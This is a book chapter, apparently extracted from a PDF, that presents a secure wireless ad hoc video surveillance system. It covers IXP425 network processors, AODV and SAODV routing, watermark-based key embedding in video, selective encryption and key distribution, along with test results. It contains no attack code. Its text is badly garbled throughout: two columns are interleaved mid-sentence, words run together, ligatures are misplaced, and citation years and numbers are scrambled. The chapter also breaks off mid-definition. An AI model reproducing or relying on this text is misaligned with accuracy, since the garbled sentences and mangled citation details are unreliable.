control, and system security should be resolved moreexible.
fl
before wireless video surveillance systems can be The development of 802.11g (IEEE, 2003) based
successfully deployed (Garcia-Macias et al, 2003). on the orthogonal frequency-division multiplexing
Among these important issues, the system security (OFDM) technology allows high-load applications
is the most challenging problem that becomes the to be adapted in wireless environment. It is claimed
main concern of this chapter. Intel IXP425 network that an optimal throughput of 54Mps and a range
processor provides an ideal choice for implement- up to 100 feet indoors can be achieved. As the
ing secure ad hoc video surveillance system, but signal is modulated at 2.4 GHz, it is less affected
the security issue is still a hot-spot that IXP425 by walls and physical obstacles than 802.11a (5
cannot handle well. Therefore, an effective video GHz). Thus our system is based on the 802.11g
encryption algorithm is necessary and meaning- wireless infrastructure ad hoc networks.
ful in a wireless video surveillance system. At the
same time, the secure routing protocol and system Ad Hoc Solution
architecture should be carefully designed to avoid
serious security aws fl (Yin, Lin, Sebastien,
Ad hoc& networks are a new wireless networking
Chu, 2005). paradigm for mobile hosts. Unlike traditional
This chapter explores the state-of-the-art cross mobile wireless networks, ad hoc networks do not
domains of wireless communication, video pro- relyonanyfixedinfrastructure.Instead,hostsrel
cessing, embedded systems and security, discusses on each other to keep the network connected. Ad
the challenging issues in wireless video surveil- hoc networks are designed to dynamically connect
lance, and presents the detailed design of a novel remote devices such as cell phones, laptops, and
highly-secure video surveillance system over ad PDAs. These networks are termed “ad hoc” because

of their shifting network topologies. Whereas allow for easy extraction, and achieve a high
wirelessLANsuseafixednetworkinfrastructure, embedding rate. The most popular application
adhocnetworksmaintainrandomconfigurations, of data embedding is digital watermark. Lots of
relying on a master-slave system connected by wire- researchworkhasbeendoneinthisfieldoverthe
less medium to enable communication between past years. Although it is worthy noting that none
mobile devices (Haas, 1999; Zhou, 1999). of the existing schemes are capable of satisfying
The system we are designing is organized in the demand for media-dependent access control in
an ad hoc manner. The nodes themselves (with wireless video surveillance system, some ideas and
camera)arecarryingtheux fl towardsthe - monitorof these digital watermark algorithms
framework
ing center, and all the routing tasks are performed are valuable and may be extended to design the
by the camera nodes. A careful deployment can desired data embedding scheme (Yin, Lin, Qiu,
sharethetrafficloadamongallthecamera Min, &nodes Chu, in press).
and effectively reduce the bottleneck effect as The classical approach to watermark com-
compared with an architectural network. It is also pressed video stream is to decompress the video,
the cheapest solution as there is no need of extra then use a spatial-domain or transform-domain
networking hardware besides the cameras, network watermarking technique to embed the watermark
processors, and the monitoring center. into the video signal, and finally recompress the
However, the design of ad hoc architecture is watermarked video. Alattar, Lin, and Celik (2003)
complex because of the routing and security is- point out three major disadvantages of using the
sues. In a monitoring system, the node positions classical approach and further present a faster and
are static and predetermined by the topology of moreexiblefl approachtowatermarkcompressed
the building. The cameras are in a nonprotected video named as compressed-domain watermark-
environment, and they are susceptible to be dam- ing. With this approach, the original compressed
aged or even destroyed. Thus it would be preferable video is partially decoded to expose the syntactic
if every node has at least two direct neighbors on elements of the compressed bitstream (such as
the way towards the monitoring center so that the encoded discrete cosine transform [DCT] coef-
system can still work properly in case some camera ficients) that is modified to insert the watermar
nodes are faulty. and reassembled to form the compressed water-
marked video.
Security Issues Patchwork (Bender, Gruhl, Morimoto, & Lu,
6)9 and
1 quantization index modulationQIM) (
Among the issues the wireless solution face, the (Chen & Wornell, 2001) are the two known tech-
system security is the most challenging problem. niques for the embedding algorithm. Patchwork
The NIST handbook An Introduction to Computer (Bender et al., 1996) is a statistical scheme based on
Securitygenericallyclassifiessecuritythreats a pseudorandom intoand statistical process. Patchwork
nine categories ranging from errors and omissions is host image independent and can invisibly embed a
to threats to personal privacy (Basgall, 1999). All specificstatisticpatterncomposed ( ofseveralpa
of these represent potential threats in wireless of specific pixels) in a host image with aGaussian
networks as well. However, the more immediate distribution. It shows reasonably high resistance
concerns for wireless communications are device to most nongeometric image modifications. But
theft, denial-of-service, malicious hackers, mali- the major disadvantage is that only one bit can be
cious code, theft of service, and industrial and embedded in one frame. Moreover, this algorithm
foreign espionage. operatesspecificpairsofpointsandthestructu
Data embedding techniques allow for a signal of video bitstream is changed by some adaptive
to be hidden without dramatically distorting the processes such as transcoding. So during the de-
original content. Effective data embedding tech- tecting procedure these pairs of points at the same
niques should be able to invisibly embed data, position are not the same as the original, or even

out of borders due to the change of image size. As AODV is an on-demand protocol. Each node
a result, the extracted data are likely to be wrong. maintains its routing table only for the routes they
Our proposed scheme is based on the statistical actually use to communicate with other nodes.
property of the luminance value, but differently If a node wants to initiate a new communication
we use image fields instead of pairs of points with anothertonode that is not in its current rout-
overcome above mentioned problems. ing table, a route request (RREQ) is broadcast.
ChenandWomellpropose ) 1 02 ( aQIMscheme If a node receives such a request, it looks up its
for efficiently embedding and drawing out data.tabletofindwhetherthereisapathtot
routing
QIM method embeds information not simply by
destination nodes. If there exists a path, it replies
adding numbers to the host signal, but by first
a route reply (RREP); otherwise, it broadcasts the
modulating an index of sequence of indices with RREQ.IfanodereceivesthesameRREQtwice,it
the embedded information and then quantizing simply discards the message. Routes are maintained
the host signal with the associated quantizer or in the routing table as long as they send packets.
sequence of quantizers. During the detecting pro- If nothing is received after a predefined timeout
cedure, the embedded information is determined value, the corresponding route entry is deleted. In
by judging the minimum distance between the case of nodes failure, neighbors on the active path
embedded signal and different quantized results. send a special RREP to the source which can start
It is known that the QIM method is better a new paththandiscovery phase. Neighbor’s discovery
additive spread spectrum and generalized low-bits is done either by local broadcasting of HELLO
modulation (LBM) not only from the point of rate messages or by receiving a broadcast message from
distortion-robustness tradeoffs, but also against a neighbor given that the links between nodes are
bounded perturbation and fully informed attacks bidirectional.
arising in several copyright applications. Since Perkins and Royer (1999) try to avoid relying
requantization is carried out in the transcoding on the underlying MAC-layer protocol, but no
procedure and the quantizers are different from solution has been proposed to avoid the overhead
the ones used in video encoding process, lots of created by the HELLO message. In our system
computational errors are produced and the detec- the routing protocols are coupled with the address
tion is likely failed. Our scheme improves the resolution protocol (ARP) protocol as described
QIMbyproposinganapproachtoaltertheby average
Desilva and Das (2000) so that we can avoid
luminancevalueoffields. broadcasting HELLO messages. In addition, it
is preferred to implement the routing protocol at
Routing Protocol link layer due to the following reasons (Johnson,
Maltz, & Broch, 2001):
In recent years, a large number of ad hoc routing
protocols have been proposed in the literature • Pragmatically, running the protocol at the link
(Broch, Maltz, Johnson, Hu, & Jetcheva, 1998; layer maximizes the number of mobile nodes
Perkins & Royer, 1999; Per, 1999; Samir, Perkins, that can participate in ad hoc networks.
& Royer, 2000). In all these studies, two on-demand • Historically, the protocol has grew from a mul-
routing protocols show good performance: ad hoc tihop propagateing version of the Internet’s
distance vector (AODV) (Perkins & Royer, 1999) address resolution protocol (Plummer, 1982),
and DSR. In a scenario where a high volume of as well as from the routing mechanism used
traffic goes through a static ad hoc network (by 802 source routing bridges (Perlman,
in IEEE
staticwemeanthatthenodesconfigurationdoes 1992).
not change or changes slowly), AODV performs • Technically, our design would expect the pro-
better than DSR due to less additional load being tocol to be simple enough so that it could be
imposed by source routes in data packets. Therefore implementeddirectlyinthefirmwareinside
our system is based on the AODV protocol. wireless network interface cards, well below
the layer 3 software within mobile nodes.

Network Processor sion, and multimedia processing, thus making it

an ideal choice for implementing secure ad hoc
The Intel IXP425 network processors are used as video surveillance systems.
the basic processing unit to design our wireless Though Intel IXP425 network processor is an
video surveillance system. Intel® IXP425 network ideal choice for implementing secure ad hoc video
processor is a highly integrated, versatile single- surveillance systems, the security issue is still a
chip processor used in a variety of products that hot-spot that IXP425 cannot handle well on its own.
need network connectivity and high performance For example, video encryption is very important
to run their unique software applications. The in wireless LAN environment since everyone can
Intel IXP425 network processor combines inte- receive the video content and inject the faked video
gration with support for multiple WAN and LAN packets. Unfortunately, normal data encryption
technologies in a common architecture designed functions like AES provided by IXP425 is too
to meet requirements for high-end gateways, computationally expensive to be applied to every
voice over IP (VoIP) applications, wireless access single outgoing packet, especially in wireless ad
points, small-to-medium enterprise (SME) routers, hoc network environment which should consider
switches, security devices, Mini-DSLAMs (digital power limitation of wireless devices (Allman,
subscriber line access multiplexers), xDSL line 2002; Borisov et al., 2003). Therefore, an effective
cards, industrial control, and networked imaging video encryption algorithm is necessary. At the
applications. The framework of Intel® IXP425 same time, the secure routing protocol and system
is shown in Figure 1 (Intel, 2006). Intel IXP425 architecture should all be carefully designed to
network processor provides diverse functionalities, avoidserioussecurityaws. fl
including data encryption, secure data transmis-
Figure1.FrameworkofIntel®IXP425

A novEl sEcurE vIdEo in Figure 2. Each camera node is equipped with

survEIllAncE systEM an IXP425 processor and 802.11g wireless card.
The video source is captured by the camera, and
framework design of wireless then compressed by the processor locally. After
networks that, a watermark containing the authentication
information and encryption key of the video data is
The system is based on the 802.11g wireless ad hoc embedded into the video signal. The watermark is
infrastructure. Intel IXP425 network processors are designedtoberobustanddifficultfortheattack
used as the basic processing unit. The 802.11g is a to remove. The video data are then encrypted us-
physical layer standard for WLANs with 2.4GHz ing our early proposed video selective encryption
andGHz5 radiobands.Itspecifiesthreeavailable scheme(Yin,Lin,Qiu,Li,Tan, & which
, )05 2 is
radio channels. The maximum link rate is 54Mbps implemented to be compatible with the hardware
per channel whereas 802.11b has 11Mbps. The encryption engine supported by IXP425, so that
802.11g standard uses the OFDM modulation. the whole video processing can be performed in
However, for backward compatibility with 802.11b, real-time.
802.11g also supports complementary code-keying The camera nodes are organized as a wireless
(CCK) modulation and, as an option for faster link ad hoc network in which every node also functions
rates, it allows packet binary convolutional coding as a router to relay the video data from other nodes.
(PBCC) modulation (Wentink, 2003). Encrypted framesarefinallyrouted - tothemoni
Our wireless video system is composed of a set toring center, traveling through a series of camera
of camera nodes and a monitoring center, as shown nodes. Usually the physical locations of all camera
Figure 2. Architecture of secure wireless video systems
0
nodesarefixed.Itispossiblethatsomeframe) nodes of are

a group of pictures (GOP) and directly
out of range from the main network. In this case, modulated into the direct current (DC) component
some bidirectional signal repeaters of DCT
or amplifiers
coefficients of luminance blocks. In our
could be placed in strategic points to provide robust algorithm, 200 bits of data can be embedded in
coverage for every node (Yin et al., 2005). one I-frame of size 640x480. Moreover, the key
takes only 128 bits among the data.
Video Processing In order to improve the error resilience capa-
bility, we employ Reed-Solomon (RS) code as the
For the sake of security concerns, encryption keys error control scheme. RS code is used to encode
are updated periodically. Thus, a core part of the thekeymessagesandan8-bitag fl andthistakes
system is how to embed encryption keys in the the remainder 64 bits for RS code words. Then, all
video data stream. Unlike normal watermarking the GOPs are encrypted by the selective encryption
techniques, in our system the camera nodes should algorithm, which contains some hash functions
not only detect the existence of a new encryption supported by IXP425 hardware, corresponding
key but also extract it without losing any informa- to the old key. Finally, the encrypted data are sent
tion, as shown in Figure 3. out to a neighbor node via the wireless network.
Our key embedding algorithm focuses on the After the data are received, the incoming packets
reliability and accuracy of embedded keys against are first decrypted and then decoded. When the
the influences introduced by transmission embedded errors
key messages are detected, the new
and adaptive mechanisms. Real-time processing is key is used for future data decryption. If a GOP
also a requirement when designing the algorithm. is badly damaged, the embedded key messages
The key embedding process can be divided into may not be extracted correctly. Therefore, we use
two parts: key embedding and key detecting. The more than one GOP to embed the rekey messages
firstpartisconductedbythevideoencoder, while
for redundant recovery (Yin et al., 2005). Figure
the second part is conducted by the video decoder. 4 gives an example of three GOPs containing the
New keys are embedded in the I-frames (Intra redundant key messages.
Figure 3. Real-time key embedding and key detecting process, Ki is the 128-bit key information used to
encrypt the video content

Figure 4. The redundant GOPs used in key updating process. From GOPi+1 to GOPi+3 there are three
GOPs that contain the redundant key messages
system security Management has built in capabilities for extension headers. The
secure ad hoc distance vector (SAODV) protocol
To develop a secure wireless video surveillance is a proposal by Zapata (2005) for such extension
system, it is necessary to develop an effective headers. The extensions are used to send signatures
video encryption algorithm, and meanwhile the andhashvaluesthatarelaterusedforverificat
secure routing protocol and system architecture of the routing packets. The SAODV is not meant to
should all be carefully designed to avoid serious yield any confidentiality since this is usually no
securityaws. fl needed or desired in general ad hoc networks. The
protocol does provide means to get authentication,
Confidentiality integrity, and nonrepudiation of the routing control
packets. The protocol extensions use asymmetric
Data confidentiality is usually assured - by ento achieve authentication by signing
cryptography
cryption. However, encryption introduces large the data packets with the private key. This allows for
computational overhead. In stringent environment the destination node and all intermediate nodes to
like real-time video transmission, encryption can validate the request. Also, this allows for the nodes
become the system bottleneck and it is the common to be certain that no one has altered the packets.
knowledge that full video stream encryption is not However,somefieldsofthepacketsmustchange
a good choice (Liu & Eskicioglu, 2003). Our video and these are signed as if they were zeroed out.
selective encryption algorithm takes advantage of Toallowforverificationofthehopcountfield,a
the properties of monitored video to achieve secure, one-way hash chain is utilized. The initiator of the
real-time encryption. route request decides a max hop count, such as 10
If the routing messages are not protected, eaves- or 15. It also generates a random value which is sent
droppers may discover the network topology by asthehashforthefirsthopcount.Thevalueisalso
listening to the routing information and then attack hashed the max hop number of times producing a
the most active notes in the network. Topology so-called top hash. Each node can verify the hop
information disclosure is not a threat by itself, but count by checking that the incoming hash value
itcanmakeotherattacksmoreefficient. However,
hashed max hop count minus the current hop count
encrypting routing information could greatly number of times is equal to the top hash. Since the
increase the overhead. The basic AODV protocol top hash value is not changed, and thus signed,

this provides the means to authenticate even the Reactive Protection Scheme
mutable hop count.
The SAODV extensions allow for two different The ad hoc environment is usually considered as
waysfornodestoreplytoarouterequest. Thefirst
physically insecure. For instance, cameras can
way is to only allow the destination to reply. In easily be stolen or corrupted. A corrupted camera
this way the protocol works as described above. node can be used as a Byzantine enemy (Lamp-
The destination node creates a route reply and ort, Shostak, & Pease, 1995) to attack the rest of
signs it using its own secret key. The route reply the network. However, resources in the ad hoc
is sent according to the usual AODV and each network are limited due to the embedded nature
intermediate node can verify the reply and discard of the nodes; especially computational power is
it if not valid. This approach does not consider the system bottleneck. In this situation, signing
the possibility of having intermediate nodes reply every packet between every node is not realistic
directly if they do have a valid route already. To for real-time multimedia streaming. Besides, if a
add the ability for route discovery optimization a malicious entity controls a node, it also controls the
double signature scheme is devised. For each route authentication keys, and systematic authentication
request a second signature is added to the packet. is not useful against this type of attack.
This signature is stored in each intermediate node In our system only routing protocol messages
when they set up the reverse route. Later on, when are systematically signed and time-stampeded
a new route is needed because of node movement to avoid basic attacks such as erroneous routing
between the two peers an intermediate node that packetooding.fl Topreventmoresubtleattackslike
still has a route can reply directly by also includ- grey hole or session hijacking, we use the existing
ing the second signature and the original signature knowledge about the data stream (e.g., continuity,
(Yin et al., 2005). In addition to this, the actual life stability,fixedlength,etc.)todetectmisbehavior
time is also sent in the reply which is signed by the in the trusted network. Nodes which have detected
intermediate node that sends the reply. misbehaving peers break the routing roads coming
fromthesuspectednodessothatfurthertraffic
Authentication ignored until a new (authenticated) road request
is broadcasted. The level of intrusion detection
The host-to-host authentication between the camera capability depends on the computational power.
and the monitoring center is achieved by data en- The system would have a misbehaving threshold
cryption. But in ad hoc networks, we also have to beyond which the system will cut itself from the
consider the problem of neighbors’ authentication, rest of the network. The level of the threshold and
as nodes are “observing” the external world though the way to isolate the node from the network is
the “eyes” of its neighbors. The neighbors must be worth further investigation.
authenticated before any other communication can
be initiated. In a nonauthenticated environment, Key Distribution
external nodes can insert themselves in the data path
and then collect, disrupt, or corrupt the information The key distribution solution proposed by Luo et
using man-in-the-middle or black and grey holes al. (2002) has been chosen to safely distribute and
attacks. To reduce the effect of computational power refresh encryption keys and periodically check in-
consumption attack, the authentication scheme is tegrity of the camera nodes. This protocol is based
performed at link layer. Neighbors’ authentication on the threshold share secret revealed by Shamir
isassuredbyacertificated-basedapproach - Stall
( improves the shares refreshing proposed
(1979) and
ings, 1999) which provides practical solutions for by Herzberg, Jarecki, Krawczyk, and Yung (1995).
data integrity, authentication, and nonrepudiation. The system is based on RSA public key signatures.
The practical protocol is presented by Luo, Zerfos, Eachnodegetsasimplecertificateintheform<
Kong, Lu, and Zhang (2002). vi, pki, Tsign, Texpire> where vi is the identification

number of the nodes, pki is the public key, Tsign is of our system. Intel IXP425 is a member
the time that the certificate is created,
Texpire and IXP4XX product line of network
of Intel’s
isthecertificateexpirationtime. processor, for small-to-medium enterprise,
consumer, and other edge network ap-
plications. Like Intel’s high-end network
systEM PErforMAncE processors IXP2k series, IXP425 is also a
EvAluAtIon multicore system that employs system-on-
chip (SoC) techniques to support multiple
This session will test the performance of the system WAN and LAN technologies in a highly
we designed and meanwhile introduce one approach integrated and versatile architecture. The
to evaluate such system, which may be applied to Intel XScale core at up to 533 MHz provides
general wireless video surveillance systems. headroomforcustomer-definedapplications.
It also supports a single-instruction stream
testing Environment multiple-data stream (SIMD) coprocessor
for multimedia application acceleration. In
The testing procedure involves three steps. First our system, video encoder and watermark
we evaluate the video encoding and encryption embedding are performed on XScale with
algorithms, along with the basic network stack optimization towards the SIMD coprocessor.
evaluation on a single link. In the second step, Three network processor engines (NPEs),
we measure the performance of a node for trans- like a micro-engine of IXP1k, 2k network
mitting traffic to other nodes. The thirdprocessors, step is aare designed to complement the
simulation study of a large scale network in order to Intel XScale core for many computationally
analyze how the system evolves when the number intensive data plane operations. These tasks
of cameras increases. include IP header inspection and - modifica
tion,packetfiltering,packeterrorchecking,
• Single node capability: The testbed is com- checksumcomputation,andag fl insertionand
posed of an IXP425 network processor and removal. The NPE architecture includes an
its evaluation board. The network interface ALU, self-contained internal data memory,
of the camera node is a wireless 802.11g and an extensive list of I/O interfaces, together
compatible network interface. A desktop with hardware acceleration elements. The
computer equipped with the same network hardware acceleration elements associated
interface is used to stand for the monitoring with an NPE targets a set of networking
center and to test the video decryption and applications. Each hardware acceleration
playback. element is designed to increase the speed
• Routing capability: A set of low cost com- of a specific networking task that would
puters is equipped with wireless network otherwise take many MIPS to complete by
interface and generates traffic towards a standalone
theRISC processor. Among these
tested node. Different physical dispositions functions, cryptographic hardware accelera-
are set to test one-hop and multihops routing tors (SHA-1, MD5, DES, 3DES AES) in NPEB
performance. are used in our application for selected video
• Scalability: Large scale experiments are very encryption.
challenging because they require too many
hardware. We plan to use the results obtained Experiments on key Embedding
from Steps 1 and 2 to build a realistic model of Algorithm
the node and simulate a large scale system.
• Nodal processor: Intel IXP425 network This subsection focuses on the performance evalu-
processor is chosen as the nodal processor ation of the key embedding algorithm in a wireless

environment. The algorithm is implemented on the video. Obviously, the modulation cycle is the most
platform of Intel IXP425 network processor. important factor that affects the quality of the video
We use two MPEG-2 test sequences, dinosaur sequence. When the modulation cycle is no larger
and live-captured video, which are both encoded than 4, the distortion derived from key embedding
at 640x480 size and 20fps using 500 frames. The can be neglected. Figure 6 illustrates the PSNR
sequences are selected because of their different of the dinosaur sequence at the receiver side. It is
characteristic in motion and scene change. Dino- worth noting that that the larger modulation cycle
saur contains fast motion and scene change, while can degrade not only the PSNR, but also introduce
live-capturedvideocontainsslowmotion fl andfixed
PSNRuctuation, whilemodulationcyclelessthan
scene. Besides, we should face the challenge derived 4 can provide a good quality of video.
from packet loss and bit error. We test the system Figure 7 illustrates the number of error bits
in a real wireless network environment. The last found in the detection of all the 200 bits in a frame
module is a key detecting and decoding module, against the modulation cycle C. The downscaling in
which contains selective encryption algorithm, the transcoder reduces half of the width and height
MPEG-4 decoder, and the key embedding algo- of the original video. This procedure reduces the
rithm. They are used to decrypt the bitstream using blocks in each field, but does not have too much
old session key, and then detect the embedded key impact on the detection quality. However, it can
messages and decode the compressed video into be seen that the requantization greatly impacts the
playback video. detection quality when the modulation cycle is less
Based on this platform, we conduct a series of than 3. As shown in Figure 7, when the quantizer
experiments to evaluate the system performance in the requantization (denoted by “new quantizer”
(Yin et al., 2005). The source-coding distortion in the figure) is higher and the quantizer in the
introduced by our key embedding algorithm is source encoding (denoted by “old quantizer” in
illustrated in Figure 5. The video clip is MPEG-2 this figure) is closer to half of “new quantizer,”
encoded with different modulation cycle. It is then more error bits appear in the detection procedure.
transcoded and decoded by MPEG-4 decoder. All When the modulation cycle is more than 4, errors
the four pictures are selected from the playback have almost disappeared.
Figure5.Theeffectofsecuritymanagementonvideo
Original One-frame encrypted All frame encrypted

FigureThe
.6 PSNRofframesandtheprobability of 7. Average error bits in total 200bits embed-
Figure
successfully detecting 200 bits in a frame changed ded in an I-frame after transcoding with different
with the modulation cycle at the receiver modulation cycles and quantizers
Figure 8. Average error bits in total 200bits of a GOP by using different packet loss rates, (a) RS code
isnotused,while(b)RS(25,17)codeisused
(a) (b)
Figure 8 reveals the average error bits when packets leads to some error bits of the extracted
receiving 200 bits data vs. the packet loss rate in key message.
the network. It can be seen that the extracted data As for the coding speed, Table 1 shows the
error rate in a GOP rises as the packet loss rate coding time between the key embedded coding
increases. Usually the bitstream of an I-frame is scheme and pure MPEG-2 encoder without data
divided into more than 10 packets for transmis- embedding.Wecanfindthataftertheintroduction
sion in the network. As a result, key information of the key embedding algorithm, the processing
is distributed into all the packets and the loss of time is only increased by around 6%.

simulation of routing Protocols ated (we do not consider the effect of reverberation
againstobstacleshere)The . figureshowsthatthe
Preliminary simulations on AODV have been con- monitoring center is the bottleneck of the archi-
tecture. This is inevitable in a monitoring system
ducted in order to validate the choice of the routing
where all the streams are converging in one point.
protocol. The objective here is to have a qualitative
However, this phenomenon implies that the over-
evaluation of the routing protocol. Simulations have
been conducted using NS2 simulator. all capacity is limited by the performance of the
The arrows in Figure 9(a) represent the streammonitoring center.
paths and we can see that the nodes are choosing
the shortest paths to reach the monitoring center
in order to reduce the number of hops per path in futurE trEnds
comparison with an architectural network.
Figure(b)9 revealsthevolumeoftrafficreceived With the continuing need for video surveillance
by each node in the scenario where a few cameras inbothfixedandremotelocations,newadvances
areplacedatdifferenceoors fl inabuilding andthe
in wireless networking would enable the develop-
distance between the nodes are greatly exagger- ment of a more secure, highly reliable wireless
video network capable of supporting real-time
high speed, high resolution video, and meanwhile
Table 1. Complexity of the key embedding algo- maintaining the highest levels of data and network
rithm security without impacting the video stream. Tech-
nical trends and key issues in the wireless video
Sequence Dinosaur Live-captured system may include:
Encoding speed without
35.45 37.27
embedding (frame/sec)
• Load balanced routing protocols: One
Encoding speed with problem of the routing protocol is that it is
33.50 35.00
embedding (frame/sec)
not reactive to the load in each node. Under
Increased processing time (%) 5.8% 6.5%
the particular topology, if a node has a more
critical location than others, a large por-
tion of the traffic may converge toward the
Figure 9(a). Topology of a small monitoring node and it may probably collapse under the
system heavytraffic.Itwouldbemoredesirablefor
an ad hoc network that the routing protocol
Figure 9(b). Bandwidth of nodes in an ad hoc

networkunderconvergingmultimediatraffic

fairly distributes the traffic load videoamong the algorithm, has been proposed
encryption
nodes. and implemented to enable the system to work in
• Local misbehavior detection system: The an open and insecure wireless environment. The
system also needs to detect misbehaving presented system offers several unique advantages:
neighbors. Only a few recent studies (e.g., (1) it provides high security guarantee; (2) it does
Kargl, Klenk, Schlott, & Weber, 2005; Marti, not require expensive access points/routers; (3) it
Giuli, Lai, & Baker, 2000) have been con- can be readily deployed since it is built upon the
ductedandreportedinthisfield.existing Besides, in ad hoc infrastructure; and (4) it is
wireless
our case, misbehavior detection capability robust in the presence of and adaptive mechanism
is limited by the computational power of the and error-prone channel. This chapter would serve
nodes. We hope to find an adaptive - mecha
as a good reference for solving the issues of wire-
nism to suit our applications. less multimedia and would bring new insights on
• Scalability: As demonstrated by the the interaction of different technologies within the
simulation results of our network layer, the cross application domain.
monitoring center, as the only nondistributed
component, is the bottleneck of the system.
Some solutions must be found to scale the AcknowlEdgMEnt
network size as far as possible.
This work was supported in part by grants from
the National Natural Science Foundation of China
conclusIon (No.60673184, No. 60432030, No.60429202,
No.90412012), national 863 program of China
A distributed video surveillance system typically (No. 2007AA01Z419) and Microsoft Joint lab
consists of many video sources distributed over funding.
a wide area, transmitting live video streams to a
central location for processing and monitoring.
However, in the traditional wire-line solution, rEfErEncEs
the deployment and maintenance of large-scale
video surveillance system are often expensive Alattar, A.M., Lin, E.T., & Celik, M.U. (2003).
and time-consuming. Thus there have been hot Digital watermarking of low bit-rate advanced
interests in wireless solution. But the practical simpleprofileMPEG- 4compressedvideo. IEEE
implementation of wireless surveillance system Transaction on Circuits and Systems for Video
still faces the challenges of framework design of Technology, 13(8), 787-800.
wireless network, video processing, video data
transmission, video quality control, and system Allman, S. (2002). Encryption and security: The
security. Among them, the system security is the advanced encryption standard. EDN (pp. 26-30).
most challenging problem and also is the main Retrieved October 7, 2007, from http://www.edn.
concern in this chapter. com/article/CA2html?ref=nbsa
. 98 7 3 5
This chapter has presented the state-of-the- Basgall. (1999). Experimental break-ins reveal
art cross domains of wireless communication, vulnerability in Internet, Unix computer secu-
video processing, embedded systems, and security, rity. Retrieved October 7, 2007, from http://www.
through the design of a new secure video surveil- cs.duke.edu/news/index.php?article=16
lance system. This system is based on the 802.11g ad
hoc wireless infrastructure. Intel IXP425 network Bender, W., Gruhl, D., Morimoto, & Lu, A. (1996).
processors are used as the basic processing unit. A Techniques for data hiding. IBM System Journal,
media-dependent video encryption scheme, includ- 38(3-4), 313-316.
ing reliable data embedding technique and real-time

Borisov, N., et al. (2003). Intercepting mobile com- wireless ad hoc networks. Ad hoc networking (pp.
munications: The insecurity of 802.11. In Proceed- 139-172). Addison-Wesley.
ings of MOBICOM 2001 (pp. 180-189).
Kargl, F., Klenk, A., Schlott, S., & Weber, M.
Broch, J.D., Maltz, A., Johnson, D.B., Hu, Y.-C., &. (2005). Advanceddetectionofselfishormalicious
Jetcheva, J. (1998). A performance comparison of nodes in ad hoc networks. Paper presented at the
multi-hop wireless ad-hoc network routing proto- First European Workshop on Security in Ad-hoc
cols. Mobile Computing and Networking, 85-97. and Sensor Networks (LNCS 3313, pp. 152-165).
Chen, B., & Wornell, G.W. .) 1 02 ( Quantiza - Lamport, L., Shostak, R., & Pease, M. (1982). The
tion index modulation: A class of provably good Byzantine generals problem. ACM Transactions
methods for digital watermarking and information on Programming Languages and Systems, 4(3),
embedding. IEEE Transaction on Information 382-401.
Theory, 47(4), 1423-1443.
Liu, X., & Eskicioglu, A. (2003, November 17-19).
Desilva, S., & Das, S.R. (2000). Experimental Selective encryption of multimedia content in
evaluation of a wireless ad hoc network. In Pro- distributed networks: Challenges and new direc-
ceedings of the th
9
International Conference on tions. Paper presented at the IASTED International
Comp. Comm. & Networks (pp. 528-534). Conference on Communications, Internet and
Information Technology (CIIT 2003), Scottsdale,
Garcia-Macias,J.A.et , al.Quality
. ) 30 2 ( ofser -
AZ.
vice and mobility for the wireless Internet. ACM
WirelessNetworks, ,9
341-352. Luo, H., Zerfos, P., Kong, J., Lu, S., & Zhang, L.
(2002). Self-securing ad hoc wireless networks.
Haas, Z. J. (1999). The Performance of the zone
In Proceedings of the Seventh IEEE Symposium
routing protocol in reconfigurable - wireless net
on Computers and Communications (ISCC ‘02)
works. Special Issue on Wireless Ad Hoc Network,
(pp. 567-574).
IEEE Journal on Selected Areas in Communica-
tions, 17(8). Marti, S., Giuli, T.J., Lai, K., & Baker, M. (2000).
Mitigating routing misbehavior in mobile ad hoc
Herzberg, A., Jarecki, S., Krawczyk, H., & Yung,
networks. In Proceedings of International Confer-
M. (1995). Proactive secret sharing or: How to cope
ence on Mobile Computing and Networking (pp.
with perpetual leakage. Lecture Notes in Computer
255-265).
Science,,339.
3 69
Perkins, C.E., & Royer, E.M. (1999). Ad-hoc on-
IEEE. (2003). 802.11g IEEE Std 2003. Retrieved
demand distance vector routing. In Proceedings
October 7, 2007, from http://grouper.ieee.org/
of the 2nd IEEE Workshop on Mobile Computing
groups/802/11/
Systems and Applications, New Orleans, (pp.
Intel. (2006). Intel® IXP425 network processor. 90-100).
Intel product brief. Retrieved October 7, 2007,
Perlman, R. (1992). Interconnections: Bridges and
from http://www.intel.com/design/network/prod-
routers. Reading, MA: Addison-Wesley.
ucts/npfamily/ixp425.htm
Plummer, D.C. (1982, November). An Ethernet ad-
Johansson, P., Larsson, T., Hedman, N., Mielcza-
dress resolution protocol: Or converting network
rek, B., & Degermark, M. (1999). Scenario-based
protocol addresses to 48.bit Ethernet hardware
performance analysis of routing protocols for
(RFC 826).
mobile ad-hoc networks. In Proceedings of ACM
Mobicom’99 (pp. 195-206). Samir, R.D., Perkins, C.E., & Royer, E.E. (2000).
Performance comparison of two on-demand rout-
Johnson, D.B., Maltz , D.A., & Broch, J. (2001). DSR
ing protocols for ad hoc networks. In Proceedings
the dynamic source routing protocol for multihop
of IEEE INFOCOM (pp. 3-12).

Shamir, A. (1979). How to share a secret. Com- kEy tErMs

munication of the ACM, 22(11), 612-613.
Ad Hoc Network: A local area network created
Stallings, W. (1999). Network security essentials:
foraspecificpurposeandestablishedforasingle
Applications and standards (1st ed.). Prenctice
session and does not require a router or a wireless
Hall.
base station. Specially, a wireless ad hoc network
Wentink, M. (2003). Overcoming IEEE 802.11g’s is a self-organized computer network with wireless
interoperability hurdles. Communication Systems communication links.
Design,.3 29- 1
Discrete Cosine Transform (DCT): A Fourier-
Yin, H., Lin, C., Sebastien, B., & Chu, X.W. (2005, related transform algorithm that is widely used for
October 13). A novel secure wireless video surveil- data compression. DCT converts data (pixels, wave-
lance system based on Intel IXP425 network pro- forms, etc.) into sets of frequencies and expresses a
cessor. In Proceedings of the 1st ACM Workshop on function or a signal in terms of a sum of sinusoids
Wireless Multimedia Networking and Performance with different frequencies and amplitudes. It is often
Modeling(WMuNeP,Montreal,
) 5 0‘ Canada. used in signal and image processing, especially for
lossy data compression.
Yin,H.Lin,
, C.Qiu,
, F.Li,
, B.Tan,
&, Z..)052 (
A media-dependent secure multicast protocol for GOP: The group of pictures (GOP) is a group
adaptive video applications. In Proceedings of the ofsuccessivepictureswithinaMPEG-codedfilm
SIGCOMM Asia Workshop. or video stream. A GOP consists of all the pictures
in successive two GOP headers.
Yin, H., Lin, C., Qiu,F., Min, G., & Chu, X. in
(
press). A novel key-embedded scheme for secure Network Processor: An integrated circuit that
video multicast systems. International Journal is optimized for networking and communications
of Computers & Electrical Engineering (No. 04- functions, typically programmable CPU chip.
NM-904).
Scalability: A property of a system, a net-
